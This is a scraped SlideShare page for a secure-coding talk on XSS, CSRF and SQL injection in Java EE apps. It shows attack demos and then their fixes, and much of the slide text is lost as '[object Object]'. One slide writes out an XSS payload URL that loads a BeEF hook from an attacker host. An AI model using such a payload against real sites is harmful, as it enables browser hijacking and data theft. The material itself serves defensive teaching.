SlideShare a Scribd company logo

Securing Java EE Web Apps

Download as PPT, PDF
Frank Kim
Frank Kim
Technology
1 of 40
Securing Java EE Web Apps ,[object Object],[object Object],[object Object]
About ,[object Object],[object Object],[object Object],[object Object]
What You Should Know ,[object Object],[object Object],[object Object]
Outline ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Cross-Site Scripting (XSS) ,[object Object],[object Object],[object Object],[object Object],[object Object]
Cross-Site Request Forgery (CSRF)
SQL Injection (SQLi) ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Outline ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
What are We Testing? ,[object Object],[object Object],[object Object],[object Object],[object Object]
Attack Scenario ,[object Object],[object Object],[object Object],[object Object]
Spot the Vuln - XSS
XSS in head.jsp
Testing the "look" Param ,[object Object],[object Object]
XSS Exploitation ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
XSS Exploitation Overview Victim 1) Sends link with evil BeEF script http://localhost:8080/roller/roller-ui/yourWebsites.do?look=&quot;><script src=&quot;http://www.attacker.com/beef/hook/beefmagic.js.php&quot;></script> 2) Victim clicks evil link 3) Victim's browser sends data to attacker Attacker
BeEF XSS Demo
Spot the Vuln - CSRF
CSRF in UserAdmin.jsp Want to use CSRF to change this field
CSRF Demo
Spot the Vuln – SQL Injection
SQL Injection in UserServlet
SQL Injection Testing ,[object Object],[object Object],No results
Exploiting SQL Injection ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
sqlmap Syntax ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
SQL Injection Demo
How it Works ,[object Object],[object Object],[object Object]
Step By Step [0] ,[object Object],[object Object]
Step By Step [1] ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Step By Step [2] ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Attack Summary ,[object Object],[object Object],[object Object],[object Object]
Outline ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Data Validation Application Should I be consuming this? Should I be emitting this? Inbound Data Outbound Data Data Store Validation Encoding Encoding Validation Outbound Data Inbound Data Validation
Output Encoding ,[object Object],[object Object],[object Object],[object Object],[object Object]
Fix XSS in head.jsp ,[object Object],[object Object]
Fix CSRF ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Fix SQL Injection ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Building Secure Software Source: Microsoft SDL
Remember ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
SANS Software Security ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
Thanks! ,[object Object],[object Object]

Recommended

W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security Policy
Markus Wichmann
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security Policy
Ksenia Peguero
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
Ryan LaBouve
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army Knife
Scott Helme
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier
 
http security response headers for web security
http security response headers for web securityhttp security response headers for web security
http security response headers for web security
Olatunji Adetunji
 
Content Security Policy (CSP)
Content Security Policy (CSP)Content Security Policy (CSP)
Content Security Policy (CSP)
Arun Kumar
 

Recommended

W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security Policy
Markus Wichmann
 
Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security Policy
Ksenia Peguero
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security Policy
Ryan LaBouve
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army Knife
Scott Helme
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Francois Marier
 
http security response headers for web security
http security response headers for web securityhttp security response headers for web security
http security response headers for web security
Olatunji Adetunji
 
Content Security Policy (CSP)
Content Security Policy (CSP)Content Security Policy (CSP)
Content Security Policy (CSP)
Arun Kumar
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Brad Hill
 
Subresource Integrity
Subresource IntegritySubresource Integrity
Subresource Integrity
Philippe De Ryck
 
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
Matt Raible
 
Bünyamin Demir - Secure YourApp
Bünyamin Demir - Secure YourAppBünyamin Demir - Secure YourApp
Bünyamin Demir - Secure YourApp
CypSec - Siber Güvenlik Konferansı
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
Francois Marier
 
Techorama 2019 - Azure Security Center Unleashed
Techorama 2019 - Azure Security Center UnleashedTechorama 2019 - Azure Security Center Unleashed
Techorama 2019 - Azure Security Center Unleashed
Tom Janetscheck
 
VolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSPVolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSP
Дмитрий Бумов
 
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım GüvenliğiBünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
CypSec - Siber Güvenlik Konferansı
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
Jim Manico
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
Jim Manico
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
Francois Marier
 
Experts Live Norway - Azure Infrastructure Security
Experts Live Norway - Azure Infrastructure SecurityExperts Live Norway - Azure Infrastructure Security
Experts Live Norway - Azure Infrastructure Security
Tom Janetscheck
 
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
Miriam Schwab
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
Jim Manico
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
Simon Willison
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers
zakieh alizadeh
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
levigross
 
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control planeMicrosoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Tom Janetscheck
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2
Jim Manico
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
Yurii Bilyk
 
XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !
XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !
XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !
Publicis Sapient Engineering
 
Optimizing your java applications for multi core hardware
Optimizing your java applications for multi core hardwareOptimizing your java applications for multi core hardware
Optimizing your java applications for multi core hardware
IndicThreads
 

More Related Content

What's hot

10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
Matt Raible
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
Francois Marier
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
Jim Manico
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
Francois Marier
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
levigross
 
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control planeMicrosoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Tom Janetscheck
 

What's hot (20)

W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Subresource Integrity
Subresource IntegritySubresource Integrity
Subresource Integrity
 
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
 
Bünyamin Demir - Secure YourApp
Bünyamin Demir - Secure YourAppBünyamin Demir - Secure YourApp
Bünyamin Demir - Secure YourApp
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
 
Techorama 2019 - Azure Security Center Unleashed
Techorama 2019 - Azure Security Center UnleashedTechorama 2019 - Azure Security Center Unleashed
Techorama 2019 - Azure Security Center Unleashed
 
VolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSPVolgaCTF 2018 - Neatly bypassing CSP
VolgaCTF 2018 - Neatly bypassing CSP
 
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım GüvenliğiBünyamin Demir - 10 Adımda Yazılım Güvenliği
Bünyamin Demir - 10 Adımda Yazılım Güvenliği
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
 
Experts Live Norway - Azure Infrastructure Security
Experts Live Norway - Azure Infrastructure SecurityExperts Live Norway - Azure Infrastructure Security
Experts Live Norway - Azure Infrastructure Security
 
Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...Content Security Policies: A whole new way of securing your website that no o...
Content Security Policies: A whole new way of securing your website that no o...
 
Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12Top Ten Web Application Defenses v12
Top Ten Web Application Defenses v12
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 
Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers Session1-Introduce Http-HTTP Security headers
Session1-Introduce Http-HTTP Security headers
 
Django Web Application Security
Django Web Application SecurityDjango Web Application Security
Django Web Application Security
 
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control planeMicrosoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
Microsoft Ignite The Tour 2020 - BRK30173 - Identity is the new control plane
 
Access Control Pitfalls v2
Access Control Pitfalls v2Access Control Pitfalls v2
Access Control Pitfalls v2
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 

Viewers also liked

XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !
XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !
XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !
Publicis Sapient Engineering
 
Optimizing your java applications for multi core hardware
Optimizing your java applications for multi core hardwareOptimizing your java applications for multi core hardware
Optimizing your java applications for multi core hardware
IndicThreads
 
Breizh JUG (mar 2011) - NoSQL : Des Grands du Web aux Entreprises
Breizh JUG (mar 2011) - NoSQL : Des Grands du Web aux EntreprisesBreizh JUG (mar 2011) - NoSQL : Des Grands du Web aux Entreprises
Breizh JUG (mar 2011) - NoSQL : Des Grands du Web aux Entreprises
Michaël Figuière
 
XebiCon'16 : PMU et le Big Data - d'une approche mono projet à une démarche e...
XebiCon'16 : PMU et le Big Data - d'une approche mono projet à une démarche e...XebiCon'16 : PMU et le Big Data - d'une approche mono projet à une démarche e...
XebiCon'16 : PMU et le Big Data - d'une approche mono projet à une démarche e...
Publicis Sapient Engineering
 

Viewers also liked (12)

XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !
XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !
XebiCon'16 : Orange - Transformation DevOps, les conteneurs sont vos alliés !
 
Optimizing your java applications for multi core hardware
Optimizing your java applications for multi core hardwareOptimizing your java applications for multi core hardware
Optimizing your java applications for multi core hardware
 
Breizh JUG (mar 2011) - NoSQL : Des Grands du Web aux Entreprises
Breizh JUG (mar 2011) - NoSQL : Des Grands du Web aux EntreprisesBreizh JUG (mar 2011) - NoSQL : Des Grands du Web aux Entreprises
Breizh JUG (mar 2011) - NoSQL : Des Grands du Web aux Entreprises
 
XebiCon'16 : Les requêtes avancées dans ElasticSearch Par Gérome Egron et I...
XebiCon'16 : Les requêtes avancées dans ElasticSearch Par Gérome Egron et I...XebiCon'16 : Les requêtes avancées dans ElasticSearch Par Gérome Egron et I...
XebiCon'16 : Les requêtes avancées dans ElasticSearch Par Gérome Egron et I...
 
XebiCon'16 : Cellenza - Votre miroir interactif connecté avec Raspberry Pi 2,...
XebiCon'16 : Cellenza - Votre miroir interactif connecté avec Raspberry Pi 2,...XebiCon'16 : Cellenza - Votre miroir interactif connecté avec Raspberry Pi 2,...
XebiCon'16 : Cellenza - Votre miroir interactif connecté avec Raspberry Pi 2,...
 
XebiCon'16 : Plan de bataille pour devenir une entreprise Data Driven Nicola...
XebiCon'16 : Plan de bataille pour devenir une entreprise Data Driven Nicola...XebiCon'16 : Plan de bataille pour devenir une entreprise Data Driven Nicola...
XebiCon'16 : Plan de bataille pour devenir une entreprise Data Driven Nicola...
 
XebiCon'16 : Europ Assistance - Un grand groupe peut-il construire une market...
XebiCon'16 : Europ Assistance - Un grand groupe peut-il construire une market...XebiCon'16 : Europ Assistance - Un grand groupe peut-il construire une market...
XebiCon'16 : Europ Assistance - Un grand groupe peut-il construire une market...
 
XebiCon'16 : Xebia Labs : Les outils de déploiement sont morts avec les Conta...
XebiCon'16 : Xebia Labs : Les outils de déploiement sont morts avec les Conta...XebiCon'16 : Xebia Labs : Les outils de déploiement sont morts avec les Conta...
XebiCon'16 : Xebia Labs : Les outils de déploiement sont morts avec les Conta...
 
XebiCon'16 : Thiga - Vendre un produit en SaaS - 5 techniques de Pricing !
XebiCon'16 : Thiga - Vendre un produit en SaaS - 5 techniques de Pricing !XebiCon'16 : Thiga - Vendre un produit en SaaS - 5 techniques de Pricing !
XebiCon'16 : Thiga - Vendre un produit en SaaS - 5 techniques de Pricing !
 
Xebicon'16 : Comment j'ai piloté mon train ?
Xebicon'16 : Comment j'ai piloté mon train ?Xebicon'16 : Comment j'ai piloté mon train ?
Xebicon'16 : Comment j'ai piloté mon train ?
 
Writing Scalable Software in Java
Writing Scalable Software in JavaWriting Scalable Software in Java
Writing Scalable Software in Java
 
XebiCon'16 : PMU et le Big Data - d'une approche mono projet à une démarche e...
XebiCon'16 : PMU et le Big Data - d'une approche mono projet à une démarche e...XebiCon'16 : PMU et le Big Data - d'une approche mono projet à une démarche e...
XebiCon'16 : PMU et le Big Data - d'une approche mono projet à une démarche e...
 

Similar to Securing Java EE Web Apps

Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
guestbd1cdca
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
mirahman
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
Haitham Raik
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Erlend Oftedal
 

Similar to Securing Java EE Web Apps (20)

Top 10 Web Security Vulnerabilities
Top 10 Web Security VulnerabilitiesTop 10 Web Security Vulnerabilities
Top 10 Web Security Vulnerabilities
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
04. xss and encoding
04. xss and encoding04. xss and encoding
04. xss and encoding
 
Joomla security nuggets
Joomla security nuggetsJoomla security nuggets
Joomla security nuggets
 
Web Security
Web SecurityWeb Security
Web Security
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
PCI Security Requirements - secure coding
PCI Security Requirements - secure codingPCI Security Requirements - secure coding
PCI Security Requirements - secure coding
 
Complete xss walkthrough
Complete xss walkthroughComplete xss walkthrough
Complete xss walkthrough
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
 
Intro to Web Application Security
Intro to Web Application SecurityIntro to Web Application Security
Intro to Web Application Security
 
Attackers Vs Programmers
Attackers Vs ProgrammersAttackers Vs Programmers
Attackers Vs Programmers
 
XSS
XSSXSS
XSS
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 

Recently uploaded

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
UiPathCommunity
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
 

Recently uploaded (20)

presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 

Securing Java EE Web Apps

Editor's Notes

  1. 2 -
  2. 2 -
  3. 2 -
  4. 2 -
  5. 2 -
  6. 2 -
  7. 2 -
  8. 2 -
  9. 2 -
  10. 2 -
  11. 2 -
  12. 2 -
  13. 2 -
  14. 2 -
  15. This slide deck is for presentations only. This slide deck is for presentations only.
  16. 2 -
  17. 2 -
  18. SANS has a number of free resources that you can access to learn about application and software security. The SANS Software Security web site has free white papers, webcasts, and other information as well as the associated AppSec Street Fighter blog. You can also follow us on Twitter for the latest news, information, and discounts on upcoming events. SANS has various courses on web application security, secure coding, and penetration testing where you can learn the skills required to create more secure applications. These courses include the following: DEV522: Web Application Security Essentials is a six-day course where you learn how to create secure web applications that are resistant to attack. DEV541: Secure Coding in Java/JEE is a four-day course that covers secure coding techniques that you can use to build more secure Java/JEE applications. DEV530: Essential Secure Coding in Java/JEE is a two-day course that covers the most essential topics for creating Java web apps. This course is ideal for students who cannot be away from the office for extended periods of time. DEV544: Secure Coding in .NET is a four-day course that covers secure coding techniques that you can use to build more secure .NET applications. DEV532: Essential Secure Coding in ASP.NET is a two-day course that covers the most essential topics for creating APS.NET apps. This course is ideal for students who cannot be away from the office for extended periods of time. DEV542: Web App Pentesting &amp; Ethical Hacking is a six-day course where you learn how to hack web applications.